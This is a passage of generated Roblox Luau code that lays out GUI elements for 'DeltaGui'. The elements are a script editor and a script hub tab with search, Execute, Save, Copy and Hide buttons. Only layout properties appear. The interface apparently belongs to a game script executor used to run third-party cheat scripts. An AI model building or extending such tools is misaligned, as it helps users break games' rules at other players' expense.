G2L["c0"]["TextYAlignment"] = Enum.TextYAlignment.Top; G2L["c0"]["BackgroundColor3"] = Color3.fromRGB(27, 32, 27); G2L["c0"]["TextXAlignment"] = Enum.TextXAlignment.Left; G2L["c0"]["FontFace"] = Font.new([[rbxasset://fonts/families/Inconsolata.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["c0"]["TextSize"] = 22; G2L["c0"]["TextColor3"] = Color3.fromRGB(249, 66, 164); G2L["c0"]["Size"] = UDim2.new(1, 0, 1, 0); G2L["c0"]["BorderColor3"] = Color3.fromRGB(0, 0, 0); G2L["c0"]["Text"] = [[*script hidden*]]; G2L["c0"]["Name"] = [[Hidden]]; G2L["c0"]["Visible"] = false; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Editor.Scroll.Source.Suggestion G2L["c1"] = Instance.new("TextButton", G2L["be"]); G2L["c1"]["TextXAlignment"] = Enum.TextXAlignment.Left; G2L["c1"]["BackgroundColor3"] = Color3.fromRGB(40, 40, 40); G2L["c1"]["TextSize"] = 17; G2L["c1"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Bold, Enum.FontStyle.Normal); G2L["c1"]["TextColor3"] = Color3.fromRGB(244, 244, 244); G2L["c1"]["Visible"] = false; G2L["c1"]["Size"] = UDim2.new(0, 130, 0, 26); G2L["c1"]["Name"] = [[Suggestion]]; G2L["c1"]["BorderColor3"] = Color3.fromRGB(60, 60, 60); G2L["c1"]["Text"] = [[keyword]]; G2L["c1"]["AutomaticSize"] = Enum.AutomaticSize.X; G2L["c1"]["BackgroundTransparency"] = 1; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Editor.Scroll.Source.Suggestion.TextPadding G2L["c2"] = Instance.new("UIPadding", G2L["c1"]); G2L["c2"]["Name"] = [[TextPadding]]; G2L["c2"]["PaddingLeft"] = UDim.new(0, 30); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Editor.Scroll.Source.Suggestion.Icon G2L["c3"] = Instance.new("ImageLabel", G2L["c1"]); G2L["c3"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["c3"]["Image"] = [[rbxassetid://413365069]]; G2L["c3"]["Size"] = UDim2.new(0, 26, 0, 26); G2L["c3"]["Name"] = [[Icon]]; G2L["c3"]["BackgroundTransparency"] = 1; G2L["c3"]["Position"] = UDim2.new(0, -30, 0, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Editor.Scroll.Source.Suggestion.Icon.UIAspectRatioConstraint G2L["c4"] = Instance.new("UIAspectRatioConstraint", G2L["c3"]); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Editor.Scroll.Left G2L["c5"] = Instance.new("Frame", G2L["bd"]); G2L["c5"]["BorderSizePixel"] = 0; G2L["c5"]["BackgroundColor3"] = Color3.fromRGB(45, 45, 45); G2L["c5"]["BackgroundTransparency"] = 1; G2L["c5"]["Size"] = UDim2.new(0, 27, 1, 0); G2L["c5"]["AutomaticSize"] = Enum.AutomaticSize.Y; G2L["c5"]["Name"] = [[Left]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Editor.Scroll.Left.Right G2L["c6"] = Instance.new("Frame", G2L["c5"]); G2L["c6"]["BorderSizePixel"] = 0; G2L["c6"]["BackgroundColor3"] = Color3.fromRGB(49, 49, 49); G2L["c6"]["BackgroundTransparency"] = 1; G2L["c6"]["Size"] = UDim2.new(0, 8, 1, 0); G2L["c6"]["Position"] = UDim2.new(1, 0, 0, 0); G2L["c6"]["AutomaticSize"] = Enum.AutomaticSize.Y; G2L["c6"]["Name"] = [[Right]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Editor.Scroll.Left.Right.BottomFade G2L["c7"] = Instance.new("UIGradient", G2L["c6"]); G2L["c7"]["Transparency"] = NumberSequence.new{NumberSequenceKeypoint.new(0.000, 0),NumberSequenceKeypoint.new(0.931, 0),NumberSequenceKeypoint.new(1.000, 1)}; G2L["c7"]["Name"] = [[BottomFade]]; G2L["c7"]["Rotation"] = 90; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Editor.Scroll.Left.Lines G2L["c8"] = Instance.new("TextLabel", G2L["c5"]); G2L["c8"]["TextYAlignment"] = Enum.TextYAlignment.Top; G2L["c8"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["c8"]["TextXAlignment"] = Enum.TextXAlignment.Left; G2L["c8"]["FontFace"] = Font.new([[rbxasset://fonts/families/Inconsolata.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["c8"]["TextSize"] = 17; G2L["c8"]["TextColor3"] = Color3.fromRGB(242, 242, 242); G2L["c8"]["AutomaticSize"] = Enum.AutomaticSize.X; G2L["c8"]["Size"] = UDim2.new(1, -5, 1, -7); G2L["c8"]["Text"] = [[1]]; G2L["c8"]["Name"] = [[Lines]]; G2L["c8"]["BackgroundTransparency"] = 0.9990000128746033; G2L["c8"]["Position"] = UDim2.new(0, 5, 0, 7); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Editor.Scroll.Left.Lines.BottomFade G2L["c9"] = Instance.new("UIGradient", G2L["c8"]); G2L["c9"]["Transparency"] = NumberSequence.new{NumberSequenceKeypoint.new(0.000, 0),NumberSequenceKeypoint.new(0.931, 0),NumberSequenceKeypoint.new(1.000, 1)}; G2L["c9"]["Name"] = [[BottomFade]]; G2L["c9"]["Rotation"] = 90; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Editor.Scroll.Left.AdaptSize G2L["ca"] = Instance.new("LocalScript", G2L["c5"]); G2L["ca"]["Name"] = [[AdaptSize]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Home.ScriptTextbox.TextboxBar.LocalScript.ScriptEditor.Editor.Scroll.Left.BottomFade G2L["cb"] = Instance.new("UIGradient", G2L["c5"]); G2L["cb"]["Transparency"] = NumberSequence.new{NumberSequenceKeypoint.new(0.000, 0),NumberSequenceKeypoint.new(0.931, 0),NumberSequenceKeypoint.new(1.000, 1)}; G2L["cb"]["Name"] = [[BottomFade]]; G2L["cb"]["Rotation"] = 90; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts G2L["cc"] = Instance.new("Frame", G2L["46"]); G2L["cc"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["cc"]["BackgroundTransparency"] = 1; G2L["cc"]["Size"] = UDim2.new(0.8833174705505371, 0, 0.9945666193962097, 0); G2L["cc"]["Position"] = UDim2.new(0.11490308493375778, 0, 0.002866186201572418, 0); G2L["cc"]["Visible"] = false; G2L["cc"]["Name"] = [[Scripts]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.TitleScript G2L["cd"] = Instance.new("Frame", G2L["cc"]); G2L["cd"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0); G2L["cd"]["BackgroundTransparency"] = 0.33329999446868896; G2L["cd"]["Size"] = UDim2.new(0.7389585375785828, 0, 0.0768190324306488, 0); G2L["cd"]["BorderColor3"] = Color3.fromRGB(15, 15, 17); G2L["cd"]["Position"] = UDim2.new(0.02895212545990944, 0, 0.04599999263882637, 0); G2L["cd"]["Name"] = [[TitleScript]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.TitleScript.MainTextBox G2L["ce"] = Instance.new("TextBox", G2L["cd"]); G2L["ce"]["PlaceholderColor3"] = Color3.fromRGB(240, 240, 240); G2L["ce"]["TextSize"] = 13; G2L["ce"]["TextXAlignment"] = Enum.TextXAlignment.Left; G2L["ce"]["BackgroundColor3"] = Color3.fromRGB(16, 16, 16); G2L["ce"]["TextColor3"] = Color3.fromRGB(255, 255, 255); G2L["ce"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Bold, Enum.FontStyle.Normal); G2L["ce"]["BackgroundTransparency"] = 0.800000011920929; G2L["ce"]["PlaceholderText"] = [[Enter your search...]]; G2L["ce"]["Size"] = UDim2.new(0.9665210843086243, 0, 0.8322147727012634, 0); G2L["ce"]["BorderColor3"] = Color3.fromRGB(15, 15, 17); G2L["ce"]["Text"] = [[]]; G2L["ce"]["Position"] = UDim2.new(0.016102850437164307, 0, 0.054676055908203125, 0); G2L["ce"]["Name"] = [[MainTextBox]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.TitleScript.MainTextBox.UICorner G2L["cf"] = Instance.new("UICorner", G2L["ce"]); G2L["cf"]["CornerRadius"] = UDim.new(0.38999998569488525, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.TitleScript.UICorner G2L["d0"] = Instance.new("UICorner", G2L["cd"]); G2L["d0"]["CornerRadius"] = UDim.new(0.38999998569488525, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts G2L["d1"] = Instance.new("ScrollingFrame", G2L["cc"]); G2L["d1"]["Active"] = true; G2L["d1"]["CanvasSize"] = UDim2.new(0, 0, 10, 0); G2L["d1"]["BackgroundColor3"] = Color3.fromRGB(20, 20, 23); G2L["d1"]["BackgroundTransparency"] = 1; G2L["d1"]["Size"] = UDim2.new(0.9701896905899048, 0, 0.8328530192375183, 0); G2L["d1"]["ScrollBarImageColor3"] = Color3.fromRGB(196, 196, 196); G2L["d1"]["BorderColor3"] = Color3.fromRGB(20, 20, 23); G2L["d1"]["ScrollBarThickness"] = 4; G2L["d1"]["Position"] = UDim2.new(0.02981029823422432, 0, 0.13256484270095825, 0); G2L["d1"]["Name"] = [[Scripts]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.ScriptFrame G2L["d2"] = Instance.new("Frame", G2L["d1"]); G2L["d2"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["d2"]["BackgroundTransparency"] = 1; G2L["d2"]["Size"] = UDim2.new(0.9900000095367432, 0, 1, 0); G2L["d2"]["Position"] = UDim2.new(0, 0, 0.011527378112077713, 0); G2L["d2"]["Name"] = [[ScriptFrame]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.ScriptFrame.UIListLayout G2L["d3"] = Instance.new("UIListLayout", G2L["d2"]); G2L["d3"]["SortOrder"] = Enum.SortOrder.LayoutOrder; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder G2L["d4"] = Instance.new("Folder", G2L["d1"]); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST G2L["d5"] = Instance.new("Frame", G2L["d4"]); G2L["d5"]["BackgroundColor3"] = Color3.fromRGB(14, 14, 14); G2L["d5"]["Size"] = UDim2.new(0.9971014261245728, 0, 0.2692020535469055, 0); G2L["d5"]["Position"] = UDim2.new(-0.0028985326644033194, 0, 0, 0); G2L["d5"]["Visible"] = false; G2L["d5"]["Name"] = [[LIST]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.UICorner G2L["d6"] = Instance.new("UICorner", G2L["d5"]); G2L["d6"]["CornerRadius"] = UDim.new(0.07999999821186066, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.ImageButton G2L["d7"] = Instance.new("ImageButton", G2L["d5"]); G2L["d7"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["d7"]["Image"] = [[rbxasset://textures/ui/GuiImagePlaceholder.png]]; G2L["d7"]["Size"] = UDim2.new(0.7325581312179565, 0, 0.8105263113975525, 0); G2L["d7"]["Position"] = UDim2.new(0.011627906933426857, 0, 0, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.ImageButton.UICorner G2L["d8"] = Instance.new("UICorner", G2L["d7"]); G2L["d8"]["CornerRadius"] = UDim.new(0.07999999821186066, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.NameScript G2L["d9"] = Instance.new("TextLabel", G2L["d5"]); G2L["d9"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["d9"]["TextXAlignment"] = Enum.TextXAlignment.Left; G2L["d9"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Bold, Enum.FontStyle.Normal); G2L["d9"]["TextSize"] = 14; G2L["d9"]["TextColor3"] = Color3.fromRGB(255, 255, 255); G2L["d9"]["Size"] = UDim2.new(0.5532065033912659, 0, 0.10177130252122879, 0); G2L["d9"]["Text"] = [[Name Hub]]; G2L["d9"]["Name"] = [[NameScript]]; G2L["d9"]["BackgroundTransparency"] = 1; G2L["d9"]["Position"] = UDim2.new(0.03259729966521263, 0, 0.8526315689086914, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.Credit G2L["da"] = Instance.new("TextLabel", G2L["d5"]); G2L["da"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["da"]["TextXAlignment"] = Enum.TextXAlignment.Right; G2L["da"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Bold, Enum.FontStyle.Normal); G2L["da"]["TextSize"] = 14; G2L["da"]["TextColor3"] = Color3.fromRGB(185, 185, 185); G2L["da"]["Size"] = UDim2.new(0.3924419581890106, 0, 0.10177130252122879, 0); G2L["da"]["Text"] = [[Uploaded By: ???]]; G2L["da"]["Name"] = [[Credit]]; G2L["da"]["BackgroundTransparency"] = 1; G2L["da"]["Position"] = UDim2.new(0.5858038067817688, 0, 0.8526315689086914, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.Execute G2L["db"] = Instance.new("Frame", G2L["d5"]); G2L["db"]["BackgroundColor3"] = Color3.fromRGB(137, 126, 251); G2L["db"]["Size"] = UDim2.new(0.18748296797275543, 0, 0.09933300316333771, 0); G2L["db"]["Position"] = UDim2.new(0.7772064805030823, 0, 0.0343393050134182, 0); G2L["db"]["Name"] = [[Execute]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.Execute.TextButton G2L["dc"] = Instance.new("TextButton", G2L["db"]); G2L["dc"]["TextWrapped"] = true; G2L["dc"]["BackgroundColor3"] = Color3.fromRGB(143, 130, 255); G2L["dc"]["TextSize"] = 12; G2L["dc"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["dc"]["TextColor3"] = Color3.fromRGB(252, 252, 252); G2L["dc"]["Size"] = UDim2.new(0.8136826753616333, 0, 1, 0); G2L["dc"]["Text"] = [[Execute]]; G2L["dc"]["Position"] = UDim2.new(-0.004637444857507944, 0, 0, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.Execute.TextButton.UICorner G2L["dd"] = Instance.new("UICorner", G2L["dc"]); G2L["dd"]["CornerRadius"] = UDim.new(0.4300000071525574, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.Execute.UICorner G2L["de"] = Instance.new("UICorner", G2L["db"]); G2L["de"]["CornerRadius"] = UDim.new(0.4300000071525574, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.Execute.ImageLabel G2L["df"] = Instance.new("ImageLabel", G2L["db"]); G2L["df"]["BackgroundColor3"] = Color3.fromRGB(137, 126, 251); G2L["df"]["Image"] = [[rbxassetid://12730588268]]; G2L["df"]["Size"] = UDim2.new(0.18111810088157654, 0, 0.64662104845047, 0); G2L["df"]["BackgroundTransparency"] = 1; G2L["df"]["Position"] = UDim2.new(0.6791929006576538, 0, 0.1616552621126175, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.Execute.UIAspectRatioConstraint G2L["e0"] = Instance.new("UIAspectRatioConstraint", G2L["db"]); G2L["e0"]["AspectRatio"] = 3.570162534713745; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.Save G2L["e1"] = Instance.new("Frame", G2L["d5"]); G2L["e1"]["BackgroundColor3"] = Color3.fromRGB(137, 126, 251); G2L["e1"]["Size"] = UDim2.new(0.18748296797275543, 0, 0.09933300316333771, 0); G2L["e1"]["Position"] = UDim2.new(0.7772064805030823, 0, 0.1766234040260315, 0); G2L["e1"]["Name"] = [[Save]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.Save.TextButton G2L["e2"] = Instance.new("TextButton", G2L["e1"]); G2L["e2"]["TextWrapped"] = true; G2L["e2"]["BackgroundColor3"] = Color3.fromRGB(143, 130, 255); G2L["e2"]["TextSize"] = 12; G2L["e2"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["e2"]["TextColor3"] = Color3.fromRGB(252, 252, 252); G2L["e2"]["Size"] = UDim2.new(0.8136826753616333, 0, 1, 0); G2L["e2"]["Text"] = [[Save]]; G2L["e2"]["Position"] = UDim2.new(-0.004637444857507944, 0, 0, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.Save.TextButton.UICorner G2L["e3"] = Instance.new("UICorner", G2L["e2"]); G2L["e3"]["CornerRadius"] = UDim.new(0.4300000071525574, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.Save.UICorner G2L["e4"] = Instance.new("UICorner", G2L["e1"]); G2L["e4"]["CornerRadius"] = UDim.new(0.4300000071525574, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.Save.ImageLabel G2L["e5"] = Instance.new("ImageLabel", G2L["e1"]); G2L["e5"]["BackgroundColor3"] = Color3.fromRGB(137, 126, 251); G2L["e5"]["Image"] = [[rbxassetid://12732367351]]; G2L["e5"]["Size"] = UDim2.new(0.18111810088157654, 0, 0.64662104845047, 0); G2L["e5"]["BackgroundTransparency"] = 1; G2L["e5"]["Position"] = UDim2.new(0.6791929006576538, 0, 0.1616552621126175, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.Save.UIAspectRatioConstraint G2L["e6"] = Instance.new("UIAspectRatioConstraint", G2L["e1"]); G2L["e6"]["AspectRatio"] = 3.570162534713745; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.LoadText G2L["e7"] = Instance.new("Frame", G2L["d5"]); G2L["e7"]["BackgroundColor3"] = Color3.fromRGB(137, 126, 251); G2L["e7"]["Size"] = UDim2.new(0.18748296797275543, 0, 0.09933300316333771, 0); G2L["e7"]["Position"] = UDim2.new(0.7772064805030823, 0, 0.307320237159729, 0); G2L["e7"]["Name"] = [[LoadText]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.LoadText.TextButton G2L["e8"] = Instance.new("TextButton", G2L["e7"]); G2L["e8"]["TextWrapped"] = true; G2L["e8"]["BackgroundColor3"] = Color3.fromRGB(143, 130, 255); G2L["e8"]["TextSize"] = 12; G2L["e8"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["e8"]["TextColor3"] = Color3.fromRGB(252, 252, 252); G2L["e8"]["Size"] = UDim2.new(0.8136826753616333, 0, 1, 0); G2L["e8"]["Text"] = [[Load Text]]; G2L["e8"]["Position"] = UDim2.new(-0.004637444857507944, 0, 0, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.LoadText.TextButton.UICorner G2L["e9"] = Instance.new("UICorner", G2L["e8"]); G2L["e9"]["CornerRadius"] = UDim.new(0.4300000071525574, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.LoadText.UICorner G2L["ea"] = Instance.new("UICorner", G2L["e7"]); G2L["ea"]["CornerRadius"] = UDim.new(0.4300000071525574, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.LoadText.ImageLabel G2L["eb"] = Instance.new("ImageLabel", G2L["e7"]); G2L["eb"]["BackgroundColor3"] = Color3.fromRGB(137, 126, 251); G2L["eb"]["Image"] = [[rbxassetid://12732352613]]; G2L["eb"]["Size"] = UDim2.new(0.18111810088157654, 0, 0.64662104845047, 0); G2L["eb"]["BackgroundTransparency"] = 1; G2L["eb"]["Position"] = UDim2.new(0.7848451137542725, 0, 0.1616552621126175, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.LoadText.UIAspectRatioConstraint G2L["ec"] = Instance.new("UIAspectRatioConstraint", G2L["e7"]); G2L["ec"]["AspectRatio"] = 3.570162534713745; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.Copy G2L["ed"] = Instance.new("Frame", G2L["d5"]); G2L["ed"]["BackgroundColor3"] = Color3.fromRGB(137, 126, 251); G2L["ed"]["Size"] = UDim2.new(0.18748296797275543, 0, 0.09933300316333771, 0); G2L["ed"]["Position"] = UDim2.new(0.7772064805030823, 0, 0.449604332447052, 0); G2L["ed"]["Name"] = [[Copy]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.Copy.TextButton G2L["ee"] = Instance.new("TextButton", G2L["ed"]); G2L["ee"]["TextWrapped"] = true; G2L["ee"]["BackgroundColor3"] = Color3.fromRGB(143, 130, 255); G2L["ee"]["TextSize"] = 12; G2L["ee"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["ee"]["TextColor3"] = Color3.fromRGB(252, 252, 252); G2L["ee"]["Size"] = UDim2.new(0.8136826753616333, 0, 1, 0); G2L["ee"]["Text"] = [[Copy]]; G2L["ee"]["Position"] = UDim2.new(-0.004637444857507944, 0, 0, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.Copy.TextButton.UICorner G2L["ef"] = Instance.new("UICorner", G2L["ee"]); G2L["ef"]["CornerRadius"] = UDim.new(0.4300000071525574, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.Copy.UICorner G2L["f0"] = Instance.new("UICorner", G2L["ed"]); G2L["f0"]["CornerRadius"] = UDim.new(0.4300000071525574, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.Copy.ImageLabel G2L["f1"] = Instance.new("ImageLabel", G2L["ed"]); G2L["f1"]["BackgroundColor3"] = Color3.fromRGB(137, 126, 251); G2L["f1"]["Image"] = [[rbxassetid://12732363389]]; G2L["f1"]["Size"] = UDim2.new(0.18111810088157654, 0, 0.64662104845047, 0); G2L["f1"]["BackgroundTransparency"] = 1; G2L["f1"]["Position"] = UDim2.new(0.6791929006576538, 0, 0.1616552621126175, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.Copy.UIAspectRatioConstraint G2L["f2"] = Instance.new("UIAspectRatioConstraint", G2L["ed"]); G2L["f2"]["AspectRatio"] = 3.570162534713745; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.Hide G2L["f3"] = Instance.new("Frame", G2L["d5"]); G2L["f3"]["BackgroundColor3"] = Color3.fromRGB(137, 126, 251); G2L["f3"]["Size"] = UDim2.new(0.18748296797275543, 0, 0.09933300316333771, 0); G2L["f3"]["Position"] = UDim2.new(0.7772064805030823, 0, 0.5887711048126221, 0); G2L["f3"]["Name"] = [[Hide]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.Hide.TextButton G2L["f4"] = Instance.new("TextButton", G2L["f3"]); G2L["f4"]["TextWrapped"] = true; G2L["f4"]["BackgroundColor3"] = Color3.fromRGB(143, 130, 255); G2L["f4"]["TextSize"] = 12; G2L["f4"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["f4"]["TextColor3"] = Color3.fromRGB(252, 252, 252); G2L["f4"]["Size"] = UDim2.new(0.8136826753616333, 0, 1, 0); G2L["f4"]["Text"] = [[Hide]]; G2L["f4"]["Position"] = UDim2.new(-0.004637444857507944, 0, 0, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.Hide.TextButton.UICorner G2L["f5"] = Instance.new("UICorner", G2L["f4"]); G2L["f5"]["CornerRadius"] = UDim.new(0.4300000071525574, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.Hide.UICorner G2L["f6"] = Instance.new("UICorner", G2L["f3"]); G2L["f6"]["CornerRadius"] = UDim.new(0.4300000071525574, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.Hide.ImageLabel G2L["f7"] = Instance.new("ImageLabel", G2L["f3"]); G2L["f7"]["BackgroundColor3"] = Color3.fromRGB(137, 126, 251); G2L["f7"]["Image"] = [[rbxassetid://12731675545]]; G2L["f7"]["Size"] = UDim2.new(0.18111810088157654, 0, 0.64662104845047, 0); G2L["f7"]["BackgroundTransparency"] = 1; G2L["f7"]["Position"] = UDim2.new(0.6791929006576538, 0, 0.1616552621126175, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.Hide.UIAspectRatioConstraint G2L["f8"] = Instance.new("UIAspectRatioConstraint", G2L["f3"]); G2L["f8"]["AspectRatio"] = 3.570162534713745; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Scripts.Folder.LIST.UIAspectRatioConstraint G2L["f9"] = Instance.new("UIAspectRatioConstraint", G2L["d5"]); G2L["f9"]["AspectRatio"] = 1.8915581703186035; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Search G2L["fa"] = Instance.new("Frame", G2L["cc"]); G2L["fa"]["BackgroundColor3"] = Color3.fromRGB(137, 126, 251); G2L["fa"]["Size"] = UDim2.new(0.1818244606256485, 0, 0.05602366104722023, 0); G2L["fa"]["Position"] = UDim2.new(0.7872427105903625, 0, 0.05453909933567047, 0); G2L["fa"]["Name"] = [[Search]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Search.TextButton G2L["fb"] = Instance.new("TextButton", G2L["fa"]); G2L["fb"]["TextWrapped"] = true; G2L["fb"]["BackgroundColor3"] = Color3.fromRGB(143, 130, 255); G2L["fb"]["TextSize"] = 12; G2L["fb"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["fb"]["TextColor3"] = Color3.fromRGB(252, 252, 252); G2L["fb"]["Size"] = UDim2.new(0.8136826753616333, 0, 1, 0); G2L["fb"]["Text"] = [[Search]]; G2L["fb"]["Position"] = UDim2.new(-0.004637444857507944, 0, 0, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Search.TextButton.UICorner G2L["fc"] = Instance.new("UICorner", G2L["fb"]); G2L["fc"]["CornerRadius"] = UDim.new(0.4300000071525574, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Search.TextButton.LocalScript G2L["fd"] = Instance.new("LocalScript", G2L["fb"]); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Search.UICorner G2L["fe"] = Instance.new("UICorner", G2L["fa"]); G2L["fe"]["CornerRadius"] = UDim.new(0.4300000071525574, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Search.ImageLabel G2L["ff"] = Instance.new("ImageLabel", G2L["fa"]); G2L["ff"]["BackgroundColor3"] = Color3.fromRGB(137, 126, 251); G2L["ff"]["Image"] = [[rbxassetid://12732045195]]; G2L["ff"]["Size"] = UDim2.new(0.20393863320350647, 0, 0.7066323161125183, 0); G2L["ff"]["BackgroundTransparency"] = 1; G2L["ff"]["Position"] = UDim2.new(0.6510000228881836, 0, 0.14100000262260437, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Search.ImageLabel.UIAspectRatioConstraint G2L["100"] = Instance.new("UIAspectRatioConstraint", G2L["ff"]); G2L["100"]["AspectRatio"] = 1.0919350385665894; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Scripts.Search.UIAspectRatioConstraint G2L["101"] = Instance.new("UIAspectRatioConstraint", G2L["fa"]); G2L["101"]["AspectRatio"] = 3.4512600898742676; -- 